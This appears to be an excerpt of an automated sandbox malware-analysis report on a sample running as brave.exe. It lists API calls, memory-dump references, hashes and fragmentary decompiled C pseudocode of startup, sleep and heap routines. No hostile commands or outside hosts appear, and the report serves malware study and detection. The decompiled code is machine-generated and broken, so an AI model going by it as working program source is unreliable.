Function 013D5B40 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,013D5DA5,?,?,?,?,?,013D5358), ref: 013D5B4E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,013D5DA5,?,?,?,?,?,013D5358), ref: 013D5B75
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,013D5DA5,?,?,?,?,?,013D5358), ref: 013D5B7C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,013D5DA5,?,?,?,?,?,013D5358), ref: 013D5B9C

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 1651d9f44d89bad11d3bdd1397b719221bf2b1193f389de5bea276a15fea0e89
Instruction ID: e1a301f45491d22bb0d473983e7def9ed787f15977fc593c92fb27c1a580482b
Opcode Fuzzy Hash: 1651d9f44d89bad11d3bdd1397b719221bf2b1193f389de5bea276a15fea0e89
Instruction Fuzzy Hash: 9BF03CB65002158FDB20BFBCE58491A7BB4FB44654B06452DDE884B319E730E819CFA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: brave.exePID: 5184, Parent PID: 2416COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.4%
Total number of Nodes:	1232
Total number of Limit Nodes:	13

Executed Functions

Function 00007FF715B91770 Relevance: 21.9, APIs: 11, Strings: 1, Instructions: 890
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00007FF715B91799
GetTickCount64.KERNEL32 ref: 00007FF715B917AA

Strings

yAA, xrefs: 00007FF715B91EB1

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Count64Tick
String ID: yAA
API String ID: 1927824332-3548342407
Opcode ID: 5c59e4f68fa790ee4f25affb1997f506df7ebcc17c0a174d9e013da98860a468
Instruction ID: 7c0d91420f20b4db588e2e953b8eedb6063aace716ff6c54afcd268d827392be
Opcode Fuzzy Hash: 5c59e4f68fa790ee4f25affb1997f506df7ebcc17c0a174d9e013da98860a468
Instruction Fuzzy Hash: 0492E461A18BC281FB39AB24E4157FAE7A0FB85F94F845135CA8C477A5EF6DD148C320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B93170 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 423
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_stricmp.MSVCRT ref: 00007FF715B93384
strcmp.MSVCRT ref: 00007FF715B9358E
strcmp.MSVCRT ref: 00007FF715B93640
strcmp.MSVCRT ref: 00007FF715B936E7
strcmp.MSVCRT ref: 00007FF715B93797
strcmp.MSVCRT ref: 00007FF715B9383A
strcmp.MSVCRT ref: 00007FF715B938BA

Strings

y, xrefs: 00007FF715B934E9
}, xrefs: 00007FF715B936FC
KF , xrefs: 00007FF715B9385B

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: strcmp$_stricmp
String ID: KF $y$}
API String ID: 3398372305-1747734038
Opcode ID: 2ee6c4bc9c73bbe018eb2e9c596121fa35c4079898e358f7aeca13623c809fb1
Instruction ID: 137421b521224ffb944864479c248a12b13b3e268def6d84776a04ed059c42b6
Opcode Fuzzy Hash: 2ee6c4bc9c73bbe018eb2e9c596121fa35c4079898e358f7aeca13623c809fb1
Instruction Fuzzy Hash: B522C462A09FC185EB39DB29E4053AAB7A0FF45B94F849131DA8C47765EF7CE148C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B91190 Relevance: 10.7, APIs: 7, Instructions: 201
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E00007FF77FF715B91190(void* __edi, void* __esp) {
				signed char _v120;
				char _v168;
				_Unknown_base(*)()* _t30;
				void* _t32;
				intOrPtr _t39;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				intOrPtr* _t87;
				long long _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				signed short* _t91;
				signed short* _t92;
				long long _t93;
				intOrPtr* _t95;
				intOrPtr _t97;
				long long* _t104;
				intOrPtr* _t109;
				signed short* _t110;
				signed long long _t111;
				void* _t113;
				signed short* _t114;
				long long _t118;
				signed long long _t122;

				_t111 =  *0x15e469e0; // 0x7ff715e510e0
				r9d =  *_t111;
				memset(__edi, 0, 0xd << 0);
				if (r9d != 0) goto 0x15b9148b;
				_t97 =  *0x15e46900; // 0x7ff715e51090
				goto 0x15b911f9;
				if ( *((intOrPtr*)( *[gs:0x30] + 8)) ==  *[gs:0x30]) goto 0x15b91434;
				Sleep(??);
				asm("lock dec eax");
				if (_t113 != 0) goto 0x15b911e8;
				_t109 =  *0x15e46910; // 0x7ff715e51098
				if ( *_t109 == 1) goto 0x15b9144b;
				if ( *_t109 == 0) goto 0x15b914b4;
				 *0x15e5101c = 1;
				if ( *_t109 == 1) goto 0x15b91460;
				if (0 == 0) goto 0x15b91481;
				_t87 =  *0x15e46870; // 0x7ff715e45a40
				_t88 =  *_t87;
				if (_t88 == 0) goto 0x15b9125c;
				r8d = 0;
				E00007FF77FF715B9E830( *_t88());
				_t30 = SetUnhandledExceptionFilter(??);
				_t104 =  *0x15e468f0; // 0x7ff715e51120
				 *_t104 = _t88;
				_t32 = E00007FF77FF715B9E640(E00007FF77FF715BB1D80(_t30, 0x7ff715b91000));
				_t89 =  *0x15e46890; // 0x7ff715b90000
				 *0x15e51010 = _t89;
				E00007FF77FF715BB1E70(_t32);
				_t90 =  *_t89;
				if (_t90 != 0) goto 0x15b912c3;
				goto 0x15b91308;
				if (2 == 0) goto 0x15b912dd;
				if (2 == 0) goto 0x15b912dd;
				_t91 = _t90 + 2;
				_t52 =  *_t91 & 0x0000ffff;
				if (_t52 - 0x20 <= 0) goto 0x15b912b0;
				r8d = 1;
				r8d = r8d ^ 0x00000001;
				_t48 =  ==  ? r8d : 1;
				goto 0x15b912bf;
				if (_t52 - 1 - 0x1f > 0) goto 0x15b91301;
				asm("o16 nop [cs:eax+eax]");
				_t92 =  &(_t91[1]);
				if (_t97 - 1 - 0x1f <= 0) goto 0x15b912f0;
				 *0x15e51008 = _t92;
				r8d =  *_t111;
				if (r8d == 0) goto 0x15b91326;
				if ((_v120 & 0x00000001) != 0) goto 0x15b9142a;
				 *0x15bc3000 = 0xa;
				_t10 =  *0x15e51038 + 1; // 0x7ffc2fc93ca1
				r13d = _t10;
				_t122 = r13d << 3;
				malloc(??);
				_t110 =  *0x15e51030; // 0x227ad1a17f0
				_t114 = _t92;
				if (r12d <= 0) goto 0x15b913ab;
				asm("o16 nop [eax+eax]");
				_t93 =  *((intOrPtr*)(_t110 + _t111 * 8));
				if ( *_t93 == 0) goto 0x15b91420;
				r8d = 1;
				if ( *((short*)(_t93 + ( &_v168 + 1) * 2 - 2)) != 0) goto 0x15b91370;
				malloc(??);
				 *((long long*)(_t114 + _t111 * 8)) = _t93;
				memcpy(??, ??, ??);
				if ( *0x15e51038 != _t111 + 1) goto 0x15b91358;
				_t22 = _t122 - 8; // -8
				 *((long long*)(_t114 + _t22)) = 0;
				 *0x15e51030 = _t114; // executed
				E00007FF77FF715B9E430();
				_t95 =  *0x15e468a0; // 0x7ff715e52708
				_t118 =  *0x15e51028; // 0x227ad1a6800
				 *((long long*)( *_t95)) = _t118;
				_t39 = E00007FF77FF715B91770( *_t95);
				_t50 =  *0x15e51020; // 0x0
				 *0x15e51024 = _t39;
				if (_t50 == 0) goto 0x15b914d2;
				_t55 =  *0x15e5101c; // 0x0
				if (_t55 == 0) goto 0x15b91499;
				return _t39;
			}

0x7ff715b9119f
0x7ff715b911ad
0x7ff715b911b8
0x7ff715b911be
0x7ff715b911cd
0x7ff715b911e1
0x7ff715b911eb
0x7ff715b911f6
0x7ff715b911fc
0x7ff715b91204
0x7ff715b91206
0x7ff715b91214
0x7ff715b9121e
0x7ff715b91224
0x7ff715b91233
0x7ff715b9123b
0x7ff715b91241
0x7ff715b91248
0x7ff715b9124e
0x7ff715b91250
0x7ff715b9125c
0x7ff715b91268
0x7ff715b9126e
0x7ff715b9127c
0x7ff715b91284
0x7ff715b91289
0x7ff715b91290
0x7ff715b91297
0x7ff715b9129e
0x7ff715b912a4
0x7ff715b912a6
0x7ff715b912b3
0x7ff715b912b8
0x7ff715b912bf
0x7ff715b912c3
0x7ff715b912ca
0x7ff715b912cc
0x7ff715b912cf
0x7ff715b912d7
0x7ff715b912db
0x7ff715b912e4
0x7ff715b912e6
0x7ff715b912f4
0x7ff715b912ff
0x7ff715b91301
0x7ff715b91308
0x7ff715b9130e
0x7ff715b9131a
0x7ff715b91320
0x7ff715b9132d
0x7ff715b9132d
0x7ff715b91335
0x7ff715b9133c
0x7ff715b91341
0x7ff715b91348
0x7ff715b9134e
0x7ff715b91352
0x7ff715b91358
0x7ff715b91360
0x7ff715b91366
0x7ff715b9137b
0x7ff715b91384
0x7ff715b9138c
0x7ff715b9139c
0x7ff715b913a4
0x7ff715b913a6
0x7ff715b913ab
0x7ff715b913b2
0x7ff715b913b9
0x7ff715b913be
0x7ff715b913c5
0x7ff715b913d5
0x7ff715b913df
0x7ff715b913e4
0x7ff715b913ea
0x7ff715b913f2
0x7ff715b913f8
0x7ff715b91400
0x7ff715b91415

APIs

Sleep.KERNEL32 ref: 00007FF715B911F6
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF715B91268
malloc.MSVCRT ref: 00007FF715B9133C
malloc.MSVCRT ref: 00007FF715B91384
memcpy.MSVCRT ref: 00007FF715B9139C
GetStartupInfoW.KERNEL32 ref: 00007FF715B9148E

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
String ID:
API String ID: 772431862-0
Opcode ID: 309c151dfdb08d85403840f07dcb93ad76ef44dc397d826adaf2311f482d26cf
Instruction ID: a4b4acd2660895fa02e57edca062346bcd216b56c52996c586ce9097d2993cc9
Opcode Fuzzy Hash: 309c151dfdb08d85403840f07dcb93ad76ef44dc397d826adaf2311f482d26cf
Instruction Fuzzy Hash: 979159B5E19E4685EB78BB15E54037AB3A0AB44FA0FC44039CA0D4B7B1DF6CE84C9720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B943C0 Relevance: 4.6, APIs: 3, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E00007FF77FF715B943C0(void* __esi, long long __rax, void* __rcx, long* __rdx) {
				long long _v48;
				char _v56;
				long long _v72;
				long long _v80;
				long _v88;
				long long _v96;
				long long _v104;
				long _t10;
				long _t13;
				long long _t22;
				long* _t25;

				_t22 = __rax;
				_t25 = __rdx;
				E00007FF77FF715B939D0(1, __rax, __rcx); // executed
				if (_t22 == 0xffffffff) goto 0x15b94470;
				_v56 = 0;
				_v48 = 0;
				_t10 = GetFileSize(??, ??);
				r13d = _t10;
				 *_t25 = _t10;
				GetProcessHeap();
				r8d = r13d;
				HeapAlloc(??, ??, ??); // executed
				r9d = 0;
				r8d = 0;
				_v72 = 0;
				_t13 =  *_t25;
				_v80 = 0;
				_v88 = _t13;
				_v96 = _t22;
				_v104 =  &_v56;
				E00007FF77FF715B94CEF(); // executed
				E00007FF77FF715B94D0D(); // executed
				if (_t13 < 0) goto 0x15b94488;
				return _t13;
			}

0x7ff715b943c0
0x7ff715b943ca
0x7ff715b943d2
0x7ff715b943de
0x7ff715b943e4
0x7ff715b943f2
0x7ff715b943fb
0x7ff715b94401
0x7ff715b94404
0x7ff715b94406
0x7ff715b9440c
0x7ff715b94414
0x7ff715b9441a
0x7ff715b9441d
0x7ff715b94422
0x7ff715b9442e
0x7ff715b94433
0x7ff715b9443c
0x7ff715b94445
0x7ff715b9444a
0x7ff715b9444f
0x7ff715b94459
0x7ff715b94460
0x7ff715b9446f

APIs

Part of subcall function 00007FF715B939D0: wcslen.MSVCRT ref: 00007FF715B93A58
Part of subcall function 00007FF715B939D0: wcslen.MSVCRT ref: 00007FF715B93AE6

GetFileSize.KERNEL32 ref: 00007FF715B943FB
GetProcessHeap.KERNEL32 ref: 00007FF715B94406
HeapAlloc.KERNEL32 ref: 00007FF715B94414

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: Heapwcslen$AllocFileProcessSize
String ID:
API String ID: 3094376029-0
Opcode ID: b987f291ff7a0700c1adc368413bd26375da92ee33c3c0e79a7e4ad3b8e5b4e5
Instruction ID: a2eb493523d170016599742d430451b79c489fe261eb5de166b3386ab3e723cc
Opcode Fuzzy Hash: b987f291ff7a0700c1adc368413bd26375da92ee33c3c0e79a7e4ad3b8e5b4e5
Instruction Fuzzy Hash: 6E11D336E14A1546EB25EB25B815747B691BB84FBCFC00231EE9D077A4EF7C8489C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BC2490 Relevance: 1.4, APIs: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00007FF77FF715BC2490() {
				long long _v296;
				void* _t51;
				void* _t53;
				void* _t54;
				int _t56;
				long long* _t65;
				void* _t66;
				void* _t67;
				int _t75;
				void* _t120;
				int _t121;
				int _t122;
				int _t123;
				int _t124;
				int _t125;
				int _t130;

				E00007FF77FF715BC19A0(_t53, _t54, _t56, _t67);
				_t121 = _t56;
				E00007FF77FF715BBA110(_t56, _t67);
				E00007FF77FF715BC2160(0x10, _t51, _t56, _t66, _t121, 0x15e46bb0, 0x7ff715bba230, _t120, _t121, _t67);
				_t128 = _t56;
				E00007FF77FF715BC1CF0(_t121);
				E00007FF77FF715B9FEC0();
				_push(_t56);
				_push(_t121);
				E00007FF77FF715BC19A0(_t53, _t54, _t56, _t128);
				_t122 = _t56;
				E00007FF77FF715BBA290(_t56, _t128);
				E00007FF77FF715BC2160(0x10, _t51, _t56, _t66, _t122, 0x15e46bd0, 0x7ff715bba3b0, _t120, _t122, _t128);
				_t130 = _t56;
				E00007FF77FF715BC1CF0(_t122);
				_t75 = _t130;
				E00007FF77FF715B9FEC0();
				_push(_t130);
				_push(_t122);
				E00007FF77FF715BC19A0(_t53, _t54, _t56, _t75);
				_t123 = _t56;
				E00007FF77FF715BBA7A0(_t56, _t75);
				E00007FF77FF715BC2160(0x10, _t51, _t56, _t66, _t123, 0x15e46c10, 0x7ff715bba8d0, _t120, _t123, _t75);
				_t132 = _t56;
				E00007FF77FF715BC1CF0(_t123);
				E00007FF77FF715B9FEC0();
				_push(_t56);
				_push(_t123);
				E00007FF77FF715BC19A0(_t53, _t54, _t56, _t132);
				_t124 = _t56;
				E00007FF77FF715BB9850(_t56, _t132);
				E00007FF77FF715BC2160(0x10, _t51, _t56, _t66, _t124, 0x15e46b70, 0x7ff715bb9970, _t120, _t124, _t132);
				_t134 = _t56;
				E00007FF77FF715BC1CF0(_t124);
				E00007FF77FF715B9FEC0();
				_push(_t56);
				_push(_t124);
				E00007FF77FF715BC19A0(_t53, _t54, _t56, _t134);
				_t125 = _t56;
				E00007FF77FF715BBA970(_t56, _t134);
				E00007FF77FF715BC2160(0x10, _t51, _t56, _t66, _t125, 0x15e46c30, 0x7ff715bbaa90, _t120, _t125, _t134);
				_t136 = _t56;
				E00007FF77FF715BC1CF0(_t125);
				E00007FF77FF715B9FEC0();
				_push(_t56);
				E00007FF77FF715BC19A0(_t53, _t54, _t56, _t136);
				_t126 = _t56;
				E00007FF77FF715BBAAF0(_t56, _t136);
				E00007FF77FF715BC2160(0x10, _t51, _t56, _t66, _t56, 0x15e46c50, 0x7ff715bbac10, _t120, _t56, _t136);
				E00007FF77FF715BC1CF0(_t126);
				E00007FF77FF715B9FEC0();
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				asm("ud2");
				_v296 = 0;
				_t65 =  *0x10;
				asm("ud2");
				0;
				E00007FF77FF715BA0980(0x15e42d20, 0x15e46c50);
				 *0x15e42d38 = 0x12400; // executed
				malloc(_t125); // executed
				 *0x15e42d30 = _t65;
				if (_t65 == 0) goto 0x15bc2789;
				 *0x15e42d28 = _t65;
				 *_t65 = 0x12400;
				 *((long long*)(_t65 + 8)) = 0;
				goto E00007FF77FF715B91520;
				 *0x15e42d38 = 0;
				 *0x15e42d28 = 0;
				goto 0x15bc2779;
				0;
				0;
				0;
			}

0x7ff715bc24a0
0x7ff715bc24ab
0x7ff715bc24ae
0x7ff715bc24c4
0x7ff715bc24c9
0x7ff715bc24cf
0x7ff715bc24d7
0x7ff715bc24e0
0x7ff715bc24e2
0x7ff715bc24f0
0x7ff715bc24fb
0x7ff715bc24fe
0x7ff715bc2514
0x7ff715bc2519
0x7ff715bc251f
0x7ff715bc2524
0x7ff715bc2527
0x7ff715bc2530
0x7ff715bc2532
0x7ff715bc2540
0x7ff715bc254b
0x7ff715bc254e
0x7ff715bc2564
0x7ff715bc2569
0x7ff715bc256f
0x7ff715bc2577
0x7ff715bc2580
0x7ff715bc2582
0x7ff715bc2590
0x7ff715bc259b
0x7ff715bc259e
0x7ff715bc25b4
0x7ff715bc25b9
0x7ff715bc25bf
0x7ff715bc25c7
0x7ff715bc25d0
0x7ff715bc25d2
0x7ff715bc25e0
0x7ff715bc25eb
0x7ff715bc25ee
0x7ff715bc2604
0x7ff715bc2609
0x7ff715bc260f
0x7ff715bc2617
0x7ff715bc2620
0x7ff715bc2630
0x7ff715bc263b
0x7ff715bc263e
0x7ff715bc2654
0x7ff715bc265f
0x7ff715bc2667
0x7ff715bc2670
0x7ff715bc2681
0x7ff715bc2683
0x7ff715bc2694
0x7ff715bc2696
0x7ff715bc26a7
0x7ff715bc26a9
0x7ff715bc26ba
0x7ff715bc26bc
0x7ff715bc26c7
0x7ff715bc26c9
0x7ff715bc26da
0x7ff715bc26dc
0x7ff715bc26ed
0x7ff715bc26ef
0x7ff715bc2700
0x7ff715bc2702
0x7ff715bc2713
0x7ff715bc2715
0x7ff715bc271e
0x7ff715bc2726
0x7ff715bc272e
0x7ff715bc273d
0x7ff715bc2747
0x7ff715bc2752
0x7ff715bc2757
0x7ff715bc2761
0x7ff715bc2763
0x7ff715bc276a
0x7ff715bc2771
0x7ff715bc2784
0x7ff715bc2789
0x7ff715bc2794
0x7ff715bc279f
0x7ff715bc27a7
0x7ff715bc27ab
0x7ff715bc27af

APIs

Part of subcall function 00007FF715BC19A0: malloc.MSVCRT(?,?,?,?,00007FF715BC23B5,?,?,?,?,00007FF715B93C24), ref: 00007FF715BC19B1

Part of subcall function 00007FF715BBA110: strlen.MSVCRT ref: 00007FF715BBA13B

Part of subcall function 00007FF715B9FEC0: RtlCaptureContext.KERNEL32 ref: 00007FF715B9FF45
Part of subcall function 00007FF715B9FEC0: RtlUnwindEx.KERNEL32 ref: 00007FF715B9FF63
Part of subcall function 00007FF715B9FEC0: abort.MSVCRT ref: 00007FF715B9FF69

Part of subcall function 00007FF715BBA290: strlen.MSVCRT ref: 00007FF715BBA2BB

Part of subcall function 00007FF715BBA7A0: strlen.MSVCRT ref: 00007FF715BBA7CB

Part of subcall function 00007FF715BB9850: strlen.MSVCRT ref: 00007FF715BB987B

Part of subcall function 00007FF715BBA970: strlen.MSVCRT ref: 00007FF715BBA99B

Part of subcall function 00007FF715BBAAF0: strlen.MSVCRT ref: 00007FF715BBAB1B

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: strlen$malloc$CaptureContextUnwindabort
String ID:
API String ID: 3412053993-0
Opcode ID: f0681c3af7f834308cd656b74fdb5bd540acaac29b47731a026287562199051c
Instruction ID: 6e729182ad93f27d7cb4810ac9a0a28798a64d39d31c53cf185cf77bed736f2d
Opcode Fuzzy Hash: f0681c3af7f834308cd656b74fdb5bd540acaac29b47731a026287562199051c
Instruction Fuzzy Hash: 2F613160E19E4650EA3CBB12A8553B7A261BB46FA9FC01435ED8D5B362CF7CD14C8368

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BC2530 Relevance: 1.4, APIs: 1, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00007FF77FF715BC2530() {
				long long _v184;
				void* _t39;
				void* _t41;
				void* _t42;
				int _t44;
				long long* _t53;
				void* _t54;
				void* _t55;
				void* _t92;
				int _t93;
				int _t94;
				int _t95;

				E00007FF77FF715BC19A0(_t41, _t42, _t44, _t55);
				_t93 = _t44;
				E00007FF77FF715BBA7A0(_t44, _t55);
				E00007FF77FF715BC2160(0x10, _t39, _t44, _t54, _t93, 0x15e46c10, 0x7ff715bba8d0, _t92, _t93, _t55);
				_t98 = _t44;
				E00007FF77FF715BC1CF0(_t93);
				E00007FF77FF715B9FEC0();
				_push(_t44);
				_push(_t93);
				E00007FF77FF715BC19A0(_t41, _t42, _t44, _t98);
				_t94 = _t44;
				E00007FF77FF715BB9850(_t44, _t98);
				E00007FF77FF715BC2160(0x10, _t39, _t44, _t54, _t94, 0x15e46b70, 0x7ff715bb9970, _t92, _t94, _t98);
				_t100 = _t44;
				E00007FF77FF715BC1CF0(_t94);
				E00007FF77FF715B9FEC0();
				_push(_t44);
				_push(_t94);
				E00007FF77FF715BC19A0(_t41, _t42, _t44, _t100);
				_t95 = _t44;
				E00007FF77FF715BBA970(_t44, _t100);
				E00007FF77FF715BC2160(0x10, _t39, _t44, _t54, _t95, 0x15e46c30, 0x7ff715bbaa90, _t92, _t95, _t100);
				_t102 = _t44;
				E00007FF77FF715BC1CF0(_t95);
				E00007FF77FF715B9FEC0();
				_push(_t44);
				E00007FF77FF715BC19A0(_t41, _t42, _t44, _t102);
				_t96 = _t44;
				E00007FF77FF715BBAAF0(_t44, _t102);
				E00007FF77FF715BC2160(0x10, _t39, _t44, _t54, _t44, 0x15e46c50, 0x7ff715bbac10, _t92, _t44, _t102);
				E00007FF77FF715BC1CF0(_t96);
				E00007FF77FF715B9FEC0();
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
				asm("ud2");
				_v184 = 0;
